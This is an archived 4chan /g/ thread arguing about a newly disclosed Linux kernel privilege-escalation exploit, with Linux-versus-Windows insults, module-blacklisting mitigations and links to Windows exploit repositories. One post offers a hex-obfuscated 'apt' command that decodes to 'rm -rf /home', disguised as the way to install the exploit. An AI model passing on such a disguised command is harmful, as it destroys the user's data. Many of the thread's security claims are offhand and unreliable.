[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: output.webm (754 KB, 1280x720)
754 KB
754 KB WEBM
Linuxbros I don't feel so good...
>>
>Winslop 11 propaganda
>>
How do I cope that my favorite OS has been outed as a complete fraud on security?
>>
Yeah im going back to windows
>>
File: 1766024004188042.gif (3.7 MB, 459x259)
3.7 MB GIF
>>108774802
the difference is the in winblows you have to trust microslop to patch vulnerabilities and in chad linux you know when the patch is released and you can trust the patch to actually work because linux is open source and transparent unlike microslop winblows. microslop winblows will never win
>>
>>108774723
>A script that must be run locally
>Literal nothingburger
many such cases
>>
>>108774723
they say it works on "openSUSE Tumbleweed: 7.0.2-1-default" but it don't, I tried it rn
>>
Gentoo wins again
>>
Does this require physical access to the computer or could someone do this remotely?
>>
>>108774723
Worst week for Linux in years. Anyway:

> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution

Then why the FUCK have they already released the exploit? Couldn't they wait for major distros to release a patch?
>>
>>108774865
>Does this require physical access
Yes, and you need to have enabled that obscure kernel module nobody uses first, which is done by sudo enable module ***, then this glorious vibecoded hack will work
>>
>A second CVE has hit the Penguin towers.
>>
Don't forget that the transition to Wayland broke a lot of previously battle hardened GUI code and the rewrite in rust movement disturbed a lot of settled code. Even now PiP still dosen't work on Wayland and Firefox on mobile is still broken.
>>
>>108774865
It needs to execute arbitrary code somehow. This can be done remotely. If you got user level access you can gain root.
>>
File: file.png (786 KB, 1200x675)
786 KB PNG
GET OFF YOUR JET AND FIX YOUR KERNEL YOU STUPID MOTHERFUCKER!
>>
File: cube pepe.jpg (23 KB, 626x514)
23 KB JPG
Kernel level privilege separation has fallen. Millions must endure the Qube.
>>
>>108774833
kernel.unprivileged_userns_clone=0 prevents it, unless you're on ubuntu or load an obscure kernel module most distros don't even ship.
>>
>>108774833
Me too.
>Unknown command: ./dirtyfrag-exp
Manjaro remains undefeated.
>>
>iOS and Android are extremely secure
>desktop operating systems are dogshit
I hate this timeline.
>>
>>108774723
arch doesn't seem vulnerable, at least i don't see those modules in the zen kernel
>>
>>108774879
from what ive read some kernel dev released it by mistake
>>
>>108775055
i believe android is like qubes, in that it compartmentalizes literally everything
>>
>>108775183
no wonder it runs like shit
>>
>>108775055
Desktops are as secure as the web browsers. Most useful apps on Android and iOS are just glorified web pages anyway, so in practice security isn't that much different.
That said one way Android and iOS are infinitely more secure than desktops is that they encrypt their data by default. People are hating on Microsoft for enabling bitlocker by default on their new computers however I found several computers and SSDs in the trash that have their sensitive data completely unencrypted. I could seriously ruin the lives of some people because they didn't know they shouldn't just throw their computers in the trash without wiping their hard drives first, or at least having bitlocker enabled.
>>
>>108774723
>if you let me run a program on your computer I hacked you bro!
lol
>>
>>108774829
>wordswordswords
Sounds like a whole bunch of Linuxtard cope to me. :^)
>>
>>108775317
>can't parse more than 2 sentences
based retard
>>
File: 1766075433606206.png (166 KB, 512x512)
166 KB PNG
>>108774964
this
embrace the QUBE
only in the QUBE may you be secure
>>
>>108775014
based retard
>>
>>108775014
LOL
you are either retarded or a 10/10 baiter
>>
>>108774879
>Then why the FUCK have they already released the exploit? Couldn't they wait for major distros to release a patch?
How would you know for sure that you're safe if they didn't release the exploit?
>>
>>108774723
really conspicuous that these latest exploits don't affect android or chromeOS
>>
not seen type your name and user_id at install screen in long time
>>
>>108775939
They don't affect any Linux unless you have a certain module installed. Android and ChromeOS just don't have that module, as is the case with most Linux distributions.
Be cool if they did though.
>>
>>108774723
It’s over. Wiped all my Btrfs drives clean. Starting fresh with a strategic deployment of ReFS and tried and true NTFS. Purchased a copy of Windows Server 2025 and an Windows 11 Enterprise license. I have also acquired a Microsoft 365 Premium subscription with Copilot.

I feel like an idiot for wasting my time on Fedora and RHEL.
>>
>>108775055
>>desktop operating systems
that's just loonix. machadOS and WONdows do not have these problems despite having 100000x more users each
>>
>>108776631
>machadOS and WONdows do not have these problems
lol
>>
>local exploit
Every OS out there is riddled with these.
>>
>>108776653
cite 1 (one) in recent years
>inb4 an article describing an exploit chain discovered by a state actor or israeli security firm that due to its complexity has been against select individuals and costs something in the ballpark of hundreds of millions on the black market
meanwhile on troonix
>lol just send a message with 'poop' repeated a bunch of times so you trigger a buffer overflow in the dilated service which runs as root
>>
>>108776677
https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768
https://windowsreport.com/cisa-warns-of-windows-privilege-escalation-flaw-affecting-windows-11-and-server-2025/
https://github.com/mbanyamer/CVE-2025-24076
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64669
>>
>>108774887
The exploit loads the module without sudo.
You can block it by disabling user namespaces but then your dockers will suck
>>
>>108774723
absolute nothing burger
>>
>>108774833
He's running a script he wrote called dirtyfrag-exp
The script obviously contains the instructions for the exploit to be executed. You "can't run it" because it's not an inbuilt command in the Linux OS.
>>
jokes on you I don't even connect my computer to the internet
>>
>>108774723
kek, notice that all of these are happening within a month on shadow-drops that have had no announcement or time to prepare? This is on purpose, Microsoft and the others are trying to kill Linux for good.
>>
>>108774829
In Linux the microsecond it's released, it's already in the wild. MS pays bug bounties to keep this under wraps until it's patched.
>>
>>108774879
>Then why the FUCK have they already released the exploit?
Microsoft psyop
Microsoft psyop
>>
I wish the penguin cult would take these things more seriously. Saying, “nothing burger” doesn’t make things any better, it just makes the community look retarded.
>>
>>108776871
>>108776869
almost every researcher follows the 90-30 rule, it's just that on troonix there's the lack of coordination between the thousands of troons running the hundreds of distros and the morons doing kernel dev, as well as complete lack of care for the end user.
no researcher is obligated to wait indefinitely for every single toy distro to roll out a patch or for every dumb maintainer asking "use case for security?" to get their shit together
>>
>>108774896
kek
>>
>>108776774
What is the downside of disabling the modules listed on the write-up? esp4, esp6, and rxrpc?
>>
>>108774836
shut up jeff
>>
>>108775939
They all affected kernel modules nobody uses that (((for some reason))) are compiled into the kernel (all RHEL derivatives).
>>
>>108774723
Daily reminder that if it's free as in freedom YOU are the product.
>>
>>108777018
Nothing unless you are for some reason using linux as a IPsec VPN router or AFS.
>>
So does this rely on rxrpc module being loaded? Cause I'm on debian and I can't see it loaded..
>>
>>108776836
Thank you, Captain Obvious, but problem is really on my side. I can't read - I'm already on linux 7.0.3 and it don't work on that
>>
>>108777053
(NTA but they mentioned that apparmor probably stops it from working in the write-up just FYI)
>>
>>108776836
>sudo apt install dirtyfrag-exp
>Error: Unable to locate package dirtyfrag-exp
How do I enable hacker repo?
>>
Okay, now how are they getting the script onto my system, and then getting access to the system to run it?
It's not Windows where I get infected with rogue scripts just by looking at a website wrong.
>>
>>108777085
per the report it's
sudo apt add -c "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>
>>108777132
>sudo apt add -c "rm -rf /home"
Oh no! Another local Linux vulnerability 0-day! Linux is so insecure, Madaidan needs to update her blog!
>>
If you care about secure computing, Linux is no longer a serious contender.
>>
>>108775278
>download some code from github or if another open source project gets MITM'd
>./configure && make && make install
>it silently executes the exploit
>it installs keyloggers, rootkits, bootkits (most freetards don't even have secure boot enabled), steals your passwords etc etc etc
>>
>>108777499
running a random script you don't trust mean you already failed the linux security model you don't have to be super user to get the interesting bits. Yes that includes reading password from memory or just upload the chrome and firefox profile. Its that easy if you have access.
>>
>>108774723
Nothingburger. lsmod doesn't even show esp4, esp6 and rxrpc as loaded for me. The modules are present though. I've added a .conf file with omit_drivers+=" esp4 esp6 rxrpc " so the modules will be removed on the next kernel installation.
>>
>>108774723
no one uses shared environments, the only way root access in general will affect anyone is if you're back in the 90s and someone wants to mess with the schools systems
>>
File: file.png (2.59 MB, 1600x1200)
2.59 MB PNG
>>108774723
>Exploit doesn't work on FreeBSD
great at all
>>
>>108776631
Lel, lnao, even
>>
File: 1676039649391131.png (290 KB, 600x569)
290 KB PNG
>>108774723
>another """vulnerability""" that has lots of prerequisites and needs local access to do anything
Is all security discourse going to be used for propaganda now? Fucking wintoddlers and fucking shills.
>>
File: wow-fucking-nothing.gif (393 KB, 250x250)
393 KB GIF
>need to have physical access
>>
Man it really is astroturf week, microjeet must be desperate
>>
>>108777499
Yeah probs best to have your LLM of choice read it first and tell you what it does.
>>
>>108777117
There are more computers in the world than yours.
>>
>>108775317
based retard
now post your hand and ID
>>
>>108774723
>obongo
>redhat
>redhat
>redhat
>another redhat
>redhat
Does it affect any other distros?
>>
>>108777768
no no you dont need physical access retard
as if supply chain attacks aren't a thing
>>
>>108774723
>no archbtw
>>
>another LPE nothingburger
>modules that any competent gentoo user doesn't even have
>>
>>108774723
WOWZERS?
If someone on my puter has local access he can HECKING DO THAT just run a script like that?
Bros Im pogging rn...
Next time you will tell me a hacker can type sudo rm -rf /* in my terminal???
>>
Oh no. I have to immediately patch. Oh, wait, I'm the only user on my systems.
>>
>>108776759
>no response
Wrecked. I don't know why people comment on this sort of thing when they seemingly know absolutely nothing about it. Why was he so confidently wrong? The knowledge he lacked was just a search away.
>>
>>108776903
Everyone on every OS has basically accepted that the user -> root barrier is not a barrier they can rely on. Everyone puts their barriers somewhere more sensible.
This is like bombing no man's land. It's already fucked out there, for everyone.
>>
>>108778166
It does feel very forced. All the attempts at bigging up local exploits on here. Normally I don't believe that companies take the time to shlil on this shithole, but I think in this case retards have listened to shills on other sites, so the message is filtering into here as well.
It just relies on people not understanding basic realities of computing, so most of /g/ is vulnerable.
>>
>>108780181
there's definitely corporate shilling here.
>>
>>108774723
>root
is that all? you still need access to the computer network
>>
anyways, will this be useful to root android phones?
>>
arch won again? unbelievable
>>
>>108777761
To get local execution you just need a decent web browser exploit and chain that.
>>
>>108776871
Didn't legit exploits get released because the person in question wasn't getting paid out. These companies are jewish af.
>>
File: freebsd2icon.jpg (85 KB, 387x397)
85 KB JPG
>>108774723
notice how freechads don't give a fuck. we aint getting hacked even with vulns
>>
>>108780150
>Why was he so confidently wrong? The knowledge he lacked was just a search away.
Retards love to spout out garbage, then disappear when they get BTFO'ed.
At least all these recent vulnerabilities in Linux are getting fixed for good. Meanwhile in proprietaryland, Windows doesn't have the world probing its source code for vulns and consequently the nation-state zero days are gonna be around for a long time.
>>
>>108782074
because no one cares enough to analyze the bsd source.
>>
What is the root account is disabled and you only use sudo?
>>
>>108774723
....and now its patched.
thats what open source is all about.
>>
>>108774829
You've never audited an update before installing it. Who are you trying to kid?
>>
>>108782120
Root account always exists.
>>
>>108774723
what the fuck!
imagine all the undisclosed stuff NSA has at its disposal



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.